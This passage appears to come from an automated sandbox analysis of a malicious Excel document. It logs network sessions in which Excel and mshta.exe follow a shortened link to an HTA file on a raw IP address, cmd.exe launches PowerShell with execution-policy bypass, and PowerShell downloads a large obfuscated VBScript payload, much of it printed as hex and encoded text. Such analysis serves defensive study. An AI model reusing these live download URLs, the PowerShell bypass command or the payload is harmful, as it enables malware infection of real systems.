                                                              Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 [TRUNCATED]
                                                              Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                              Sep 30, 2024 10:26:20.094121933 CEST224INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                              Sep 30, 2024 10:26:20.094140053 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                              Sep 30, 2024 10:26:20.094151020 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509seT%252509%252509%252509%252509%252509
                                                              Sep 30, 2024 10:26:20.094168901 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                              Sep 30, 2024 10:26:20.094180107 CEST1236INData Raw: 6b 75 47 6c 42 41 69 67 76 6c 6d 44 6f 70 6e 55 74 62 6f 43 4c 78 58 59 6b 57 58 56 59 65 6f 4f 66 4f 6b 74 7a 77 6a 53 56 49 69 5a 42 67 66 78 78 41 4b 4d 4a 56 78 56 6b 77 53 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                              Data Ascii: kuGlBAigvlmDopnUtboCLxXYkWXVYeoOfOktzwjSVIiZBgfxxAKMJVxVkwS%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                              Sep 30, 2024 10:26:20.094191074 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                              Sep 30, 2024 10:26:20.094202995 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                              Sep 30, 2024 10:26:20.094212055 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                              Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                              Sep 30, 2024 10:26:20.094223022 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                              Sep 30, 2024 10:26:20.099163055 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252528%252509%252509%252509%252509%252509%25


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.2249169104.168.7.7803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 30, 2024 10:26:29.888645887 CEST343OUTGET /356/IEnetbookupdation.vbs HTTP/1.1
                                                              Accept: */*
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: 104.168.7.7
                                                              Connection: Keep-Alive
                                                              Sep 30, 2024 10:26:30.354509115 CEST1236INHTTP/1.1 200 OK
                                                              Date: Mon, 30 Sep 2024 08:26:30 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Mon, 30 Sep 2024 08:01:23 GMT
                                                              ETag: "18c218-623519c63e67a"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 1622552
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-vbscript
                                                              Data Raw: 27 20 4d 61 69 6e 20 73 63 72 69 70 74 20 6c 6f 67 69 63 20 66 6f 72 20 70 72 6f 63 65 73 73 69 6e 67 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 64 61 74 61 0d 0a 0d 0a 27 20 44 65 66 69 6e 65 20 74 68 65 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 73 74 72 69 6e 67 20 28 75 73 65 20 61 63 74 75 61 6c 20 64 61 74 61 20 69 6e 20 70 6c 61 63 65 20 6f 66 20 22 29 29 3b 3b 3b 71 51 40 40 40 40 4d 40 40 40 40 40 40 40 40 45 40 40 40 40 40 40 40 40 2f 2f 38 40 40 40 40 4c 67 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 51 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 67 40 40 40 40 40 40 40 40 40 40 34 66 75 67 34 40 40 74 40 40 6e 4e 49 62 67 2e 2e 2e 29 29 4d 30 68 3b 3b 3b 47 68 70 63 79 2e 2e 2e 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 [TRUNCATED]
                                                              Data Ascii: ' Main script logic for processing Base64-encoded data' Define the Base64-encoded string (use actual data in place of "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@ZIYD@@Fda+mY@@@@@@@@@@@@@@@@@@@@P@@@@Lg@@L@@j@@@@@@IgG@@@@...o...w@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@E@@@@@@@@@@@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@D@@...w@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Dg...gDI3g@@@@@@@@@@@@@@@@@@@@@@@@...IvQc@@SFE@@@@@@@@@@@@@@@@@@@@@@@@@@HFYG@@...w@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                                              Sep 30, 2024 10:26:30.354645014 CEST1236INData Raw: 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                                              Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@gg@@@@...I@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@udG;;;4d@@@@@@@@GCH...g@@@@I@@@@@@@@IgG@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@...gLn&&&lbG
                                                              Sep 30, 2024 10:26:30.354655981 CEST1236INData Raw: 26 67 6f 72 40 40 40 40 59 71 40 40 40 40 40 40 29 29 4d 40 40 49 40 40 2e 2e 2e 77 40 40 40 40 40 40 40 40 49 40 40 40 40 2e 2e 2e 45 40 40 40 40 67 6f 72 40 40 40 40 59 71 40 40 2e 2e 2e 4d 77 40 40 77 40 40 4f 40 40 40 40 40 40 40 40 40 40 77
                                                              Data Ascii: &gor@@@@Yq@@@@@@))M@@I@@...w@@@@@@@@I@@@@...E@@@@gor@@@@Yq@@...Mw@@w@@O@@@@@@@@@@w@@@@EQ@@CKIo@@@@@@Yl&&&gor@@@@Yq@@@@@@))M@@U@@Rg@@@@@@@@Q@@@@...E@@I&&&3wD@@@@oEw@@@@...iUmCiD68@@w@@K...M@@@@@@Yl&&&gsG...yD68@@w@@K...M@@@@@@Yl&&&i@@H8Qw@@K...
                                                              Sep 30, 2024 10:26:30.354667902 CEST1236INData Raw: 40 40 40 40 40 45 4c 46 68 2b 40 40 51 40 40 40 40 2e 2e 2e 43 68 77 40 40 40 40 40 40 47 26 26 26 53 59 4d 46 67 30 72 4e 51 67 26 26 26 6d 67 6f 47 40 40 79 69 58 40 40 40 40 40 40 47 26 26 26 53 59 6f 57 51 40 40 40 40 2e 2e 2e 69 55 6d 4c 2e
                                                              Data Ascii: @@@@@ELFh+@@Q@@@@...Chw@@@@@@G&&&SYMFg0rNQg&&&mgoG@@yiX@@@@@@G&&&SYoWQ@@@@...iUmL...sYRQE@@@@@@D2////Fy0G0...@@@@@@@@YmfgE@@@@@@QL3hw&&&F1gNCQiOa))LFGkU...@@@@@@@@9v///xQqfgE@@@@@@Qq...yo@@Ez@@F@@Ec@@@@@@@@M@@@@@@RfgI@@@@@@QtP3&&&b@@@@...wCgYo
                                                              Sep 30, 2024 10:26:30.354682922 CEST1236INData Raw: 53 59 4b 2e 2e 2e 6e 4b 4e 40 40 40 40 2e 2e 2e 77 4b 4d 55 40 40 40 40 40 40 59 6c 26 26 26 67 73 48 46 69 38 4d 2e 2e 2e 6e 4b 74 40 40 40 40 2e 2e 2e 77 4b 4d 55 40 40 40 40 40 40 59 4c 2e 2e 2e 78 59 76 43 58 35 7a 40 40 40 40 40 40 45 45 77
                                                              Data Ascii: SYK...nKN@@@@...wKMU@@@@@@Yl&&&gsHFi8M...nKt@@@@...wKMU@@@@@@YL...xYvCX5z@@@@@@EEwXeWgcfD1gL...gco9@@@@@@...h9uLg0G...yj0@@@@@@G&&&SYf))jM&&&fnM@@@@@@Q))...d40...gcfECig@@@@@@GD@@gg@@wI@@@@CiS@@@@@@G&&&SYNCSg8@@@@@@G&&&SY))......EEKHg@@@@@@YR.
                                                              Sep 30, 2024 10:26:30.354695082 CEST1236INData Raw: 77 52 43 69 69 77 40 40 40 40 40 40 47 26 26 26 53 59 6f 78 67 40 40 40 40 2e 2e 2e 69 55 6d 45 77 30 47 4b 4f 4d 40 40 40 40 40 40 59 6c 26 26 26 6d 6b 29 29 44 69 73 31 2e 2e 2e 68 45 4e 46 68 45 4c 4b 4b 51 40 40 40 40 40 40 59 6d 45 51 6f 52
                                                              Data Ascii: wRCiiw@@@@@@G&&&SYoxg@@@@...iUmEw0GKOM@@@@@@Yl&&&mk))Dis1...hENFhELKKQ@@@@@@YmEQoRDRYRCxEMFij))@@@@@@G&&&SY))D34H@@@@@@EEQwWEQ8oO@@@@@@...hEOEQtYEw4RDhELWGoGKE@@@@@@@@YyvQYRDRYGKE@@@@@@@@Yl&&&hEOallpKKQ@@@@@@YmEQoRDRYGKE@@@@@@@@Yl&&&hEOallpKNc
                                                              Sep 30, 2024 10:26:30.354706049 CEST1236INData Raw: 44 78 49 50 2e 2e 2e 43 68 26 26 26 40 40 40 40 40 40 4b 26 26 26 53 59 6f 29 29 40 40 40 40 40 40 43 69 55 6d 44 40 40 68 30 50 67 40 40 40 40 40 40 51 76 65 40 40 79 62 2b 47 67 59 67 4b 40 40 51 40 40 40 40 47 39 4e 40 40 40 40 40 40 4b 26 26
                                                              Data Ascii: DxIP...Ch&&&@@@@@@K&&&SYo))@@@@@@CiUmD@@h0Pg@@@@@@Qve@@yb+GgYgK@@Q@@@@G9N@@@@@@K&&&SY))E...Y))E))iy@@Q@@@@ER@@REZoN...29O@@@@@@KLCEXRQE@@@@@@D2////CW9P@@@@@@K&&&SYHKF@@@@@@@@ol&&&hMEOG8...@@@@@@Hb1E@@@@@@ol&&&hMFEQWOaRdYEwYR...ihs@@@@@@G&&&SY)
                                                              Sep 30, 2024 10:26:30.354717016 CEST1236INData Raw: 40 40 4b 26 26 26 53 59 4b 2e 2e 2e 43 44 2f 2f 2f 38 40 40 4d 79 77 62 52 51 45 40 40 40 40 40 40 44 32 2f 2f 2f 2f 46 79 30 47 30 43 45 40 40 40 40 40 40 59 6d 66 6a 63 40 40 40 40 40 40 51 29 29 44 52 49 4e 40 40 79 68 4b 40 40 40 40 40 40 4b
                                                              Data Ascii: @@K&&&SYK...CD///8@@MywbRQE@@@@@@D2////Fy0G0CE@@@@@@Ymfjc@@@@@@Q))DRIN@@yhK@@@@@@K&&&SYoSw@@@@CgwrKn43@@@@@@EEw4SDgMoSg@@@@CiUmfjc@@@@@@Q))DxIP...Ch&&&@@@@@@K&&&SYo))@@@@@@CiUmD@@h0Lw@@@@@@Qve@@yb+GgYgK@@Q@@@@G9N@@@@@@K&&&SY))E...Y))E))gr@@Q@@
                                                              Sep 30, 2024 10:26:30.354727983 CEST1236INData Raw: 40 40 40 40 40 40 45 45 77 30 53 44 51 4d 6f 53 67 40 40 40 40 43 69 55 6d 4b 45 73 40 40 40 40 40 40 6f 6c 26 26 26 67 77 72 4b 48 35 4f 40 40 40 40 40 40 45 45 77 34 53 44 67 4d 6f 53 67 40 40 40 40 43 6e 35 4f 40 40 40 40 40 40 45 45 77 38 53
                                                              Data Ascii: @@@@@@EEw0SDQMoSg@@@@CiUmKEs@@@@@@ol&&&gwrKH5O@@@@@@EEw4SDgMoSg@@@@Cn5O@@@@@@EEw8SDwQoSQ@@@@CiUmKEw@@@@@@ol&&&gwIdC8@@@@@@EL3gMm/hoGICgE@@@@...v))Q@@@@CiUmEx@@WExE4PwE@@@@...EQERGaDQdvUQ@@@@CiUmEwUR...Y5pF1g))...hEGKGw@@@@@@Yl&&&hMHEQcW...29S@
                                                              Sep 30, 2024 10:26:30.354738951 CEST1236INData Raw: 40 40 40 40 40 40 40 39 76 2f 2f 2f 77 6c 76 62 67 40 40 40 40 43 74 77 6f 77 51 40 40 40 40 2e 2e 2e 69 68 47 40 40 40 40 40 40 4b 26 26 26 53 59 73 47 43 67 72 40 40 40 40 40 40 4b 62 30 63 40 40 40 40 40 40 6f 57 6d 6d 39 49 40 40 40 40 40 40
                                                              Data Ascii: @@@@@@@9v///wlvbg@@@@CtwowQ@@@@...ihG@@@@@@K&&&SYsGCgr@@@@@@Kb0c@@@@@@oWmm9I@@@@@@K&&&Sa@@UQ@@@@...Co@@@@@@@@...E@@@@@@@@g...k@@FK2@@...Q@@@@@@@@@@@@z@@&&&@@@@c@@@@@@@@@@@@@@@@@@@@igl@@@@@@KKg@@bM@@c@@RQE@@@@...Q@@@@...F+UQ@@@@......MKEgoCKEk@
                                                              Sep 30, 2024 10:26:30.359632969 CEST1236INData Raw: 64 43 43 77 5a 47 30 55 2e 2e 2e 40 40 40 40 40 40 40 40 39 76 2f 2f 2f 78 63 74 2e 2e 2e 74 40 40 70 40 40 40 40 40 40 47 26 26 26 67 68 76 62 67 40 40 40 40 43 74 77 44 2e 2e 2e 6d 2b 40 40 40 40 40 40 40 40 4b 26 26 26 53 5a 76 67 51 40 40 40
                                                              Data Ascii: dCCwZG0U...@@@@@@@@9v///xct...t@@p@@@@@@G&&&ghvbg@@@@CtwD...m+@@@@@@@@K&&&SZvgQ@@@@Cio@@@@@@@@...E@@@@@@@@g@@W@@Ct...@@...0@@@@@@@@@@Ez@@G@@Ns@@@@@@@@X@@@@@@Rfk8@@@@@@QCSih1@@@@@@K&&&SYK@@i;;;KGlhU...i0UGUU...@@@@@@@@9v///xct...t@@q@@@@@@G&&&i


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.2249165172.67.216.2444433188C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-30 08:26:16 UTC319OUTGET /Ts9zje HTTP/1.1
                                                              Accept: */*
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: og1.in
                                                              Connection: Keep-Alive
                                                              2024-09-30 08:26:16 UTC806INHTTP/1.1 302 Found
                                                              Date: Mon, 30 Sep 2024 08:26:16 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 70
                                                              Connection: close
                                                              location: http://104.168.7.7/356/ce/IEnetbookupdateion.hta
                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                              vary: Accept
                                                              x-content-type-options: nosniff
                                                              x-dns-prefetch-control: off
                                                              x-download-options: noopen
                                                              x-frame-options: SAMEORIGIN
                                                              x-xss-protection: 0
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbT9GyJJKEpHV%2Fyvt8HbYWPiqeaHgk6pnCrvxENPyIC6V23%2BYlujVJ0NuOGqw4gXm9ho1W0O1MplU2qAnJesXaRuO%2BpTRE8Fmip8cPJU3MZ2MJNEF6IXmnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8cb2d3bb1aa54345-EWR
                                                              2024-09-30 08:26:16 UTC70INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 37 2f 33 35 36 2f 63 65 2f 49 45 6e 65 74 62 6f 6f 6b 75 70 64 61 74 65 69 6f 6e 2e 68 74 61
                                                              Data Ascii: Found. Redirecting to http://104.168.7.7/356/ce/IEnetbookupdateion.hta


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.2249167104.21.78.544433496C:\Windows\System32\mshta.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-30 08:26:18 UTC343OUTGET /Ts9zje HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: og1.in
                                                              Connection: Keep-Alive
                                                              2024-09-30 08:26:19 UTC808INHTTP/1.1 302 Found
                                                              Date: Mon, 30 Sep 2024 08:26:19 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 70
                                                              Connection: close
                                                              location: http://104.168.7.7/356/ce/IEnetbookupdateion.hta
                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                              vary: Accept
                                                              x-content-type-options: nosniff
                                                              x-dns-prefetch-control: off
                                                              x-download-options: noopen
                                                              x-frame-options: SAMEORIGIN
                                                              x-xss-protection: 0
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NiqHZlIirdB7VVRpTmae8dAXfOvVAE8%2ByFSxmeizWbuU%2BDhTyC1N7HPoDouhLWtE15pOkpHZugyVRBsmH4fXEo4H7zUF2kZNCtp73H1vX14%2F%2BC0r0BlIRPA%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8cb2d3c9ea114356-EWR
                                                              2024-09-30 08:26:19 UTC70INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 37 2f 33 35 36 2f 63 65 2f 49 45 6e 65 74 62 6f 6f 6b 75 70 64 61 74 65 69 6f 6e 2e 68 74 61
                                                              Data Ascii: Found. Redirecting to http://104.168.7.7/356/ce/IEnetbookupdateion.hta


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:04:25:21
                                                              Start date:30/09/2024
                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                              Imagebase:0x13fc80000
                                                              File size:28'253'536 bytes
                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:4
                                                              Start time:04:26:16
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\System32\mshta.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                              Imagebase:0x13f9e0000
                                                              File size:13'824 bytes
                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:04:26:20
                                                              Start date:30/09/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; 